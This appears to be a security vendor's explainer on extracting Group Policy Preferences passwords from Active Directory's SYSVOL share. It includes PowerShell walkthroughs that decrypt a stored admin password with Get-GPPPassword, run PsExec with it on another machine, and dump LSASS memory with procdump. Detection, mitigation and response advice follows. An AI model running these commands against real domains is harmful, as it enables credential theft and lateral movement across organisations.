Plaintext Password Extraction

Plaintext Password Extraction

Within Active Directory, Group Policies (or Group Policy Objects) permit administrators to centrally manage configurations applied to domain-joined servers and workstations. Group Policies define policies (enforced settings) and preferences, which propagate default configurations that a user can modify. While Group Policies are an essential part of managing a healthy Active Directory-managed environment, administrators can occasionally run afoul of security best-practices.

One such example was the ability to embed passwords in Group Policy Preferences that created local users or mapped network drives. While this capability eased administrative burdens, these passwords were stored in the Group Policy Preference encrypted with a publicly available key. Therefore, an adversary with the ability to read these policies can readily extract and decrypt these passwords.

In 2014, Microsoft released a security advisory that removed the ability to create new preferences with embedded passwords, but many organizations still to this day have Group Policy Preferences that include embedded passwords.

Threat Summary

Target:

Active Directory

ATT&CK® Tactic:

ATT&CK Technique:

Difficulty

Detection:

Low

Mitigation:

Low

Response:

Low

How Plaintext Password Extraction Works

Hover to see each step

Step 1: Group Policy Preferences are stored as XML files in the SYSVOL share on domain controllers. The SYSVOL share is accessible to Authenticated Users, which means that once an adversary has gained a foothold within the network they are able to access its contents. An adversary can parse these files manually, looking for instances of the attribute CPassword, which contains the encrypted passwords. Adjacent attributes will also indicate other details like the username. Tools like PowerSploit’s Get-GPPPasswords cmdlet automate the process of acquiring and decrypting these passwords.

PS> Import-Module PowerSploit
PS> Get-GPPPassword
 
Changed   : {2020-08-17 11:14:01}
UserNames : {Administrator (built-in)}
NewName   : [BLANK]
Passwords : {WhatAGreatPassword123!}
File      : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml
 
PS> 

Step 2: Now that the adversary has the username and password for a local administrator, they can enumerate the computers in Active Directory on which the group policy is applied, providing them with a list of computers to which they can authenticate with this credential.

With this list, the adversary can continue to expand its footprint within the organization. In this example, the adversary connects to another computer and creates a memory dump of the LSASS.exe process, which can enable further lateral movement or privilege escalation.

PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml
 
PS> $XML.GPO.LinksTo
 
SOMName SOMPath       Enabled NoOverride
------- -------       ------- ----------
Comp    domain.com/Comp true    false
 
 
PS> $DN = Get-ADOrganizationalUnit -filter { Name -eq $XML.GPO.LinksTo.SOMName } | Select -expand DistinguishedName
 
PS> Get-ADComputer -filter "*" -SearchBase $DN
 
 
DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com
DNSHostName       :
Enabled           : True
Name              : Server1
ObjectClass       : computer
ObjectGUID        : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf
SamAccountName    : SERVER1$
SID               : S-1-5-21-5840559-2756745051-1363507867-16924
UserPrincipalName :
 
 
PS> .\PSExec.exe -u Administrator -p WhatAGreatPassword123! \\server1 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
PS>

Detect, Mitigate, and Respond

Difficulty: Low

Because of the large volume of read operations occurring in normal operations, it is not possible to directly detect an adversary’s access to these files. However, conducting an audit for passwords embedded in Group Policy Preferences is possible using the same techniques an adversary would. Using the Get-GPPPassword cmdlet against each domain will enumerate embedded passwords (note that this will also reveal the plaintext). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them:

# Replace this path with the path to SYSVOL to check
$SYSVOL_Path = "\\domain.com\sysvol"
 
Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"
 
# Sample Output using \\domain.com\sysvol
\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Gro
ups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01"
uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local
Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0"
neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>

Difficulty: Low

Simply, embedded passwords in Group Policy Preferences should be removed. Additionally:

  • Ensure all domain controllers are running on current operating system versions with the latest patches, as current versions of Windows Server do not permit the embedding of passwords in Group Policy Preferences.
  • Replace the use of Group Policy Preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
  • Adopt solutions that replace embedded passwords with authenticated dynamic lookups.

Difficulty: Low

Should you discover embedded passwords in Group Policy Preferences, the following actions can be taken:

  • Remove the embedded password from the Group Policy Preference.
  • Reset the password for the account.

Additional Resources

Learn More About Plaintext Password Extraction

Stealthbits Solutions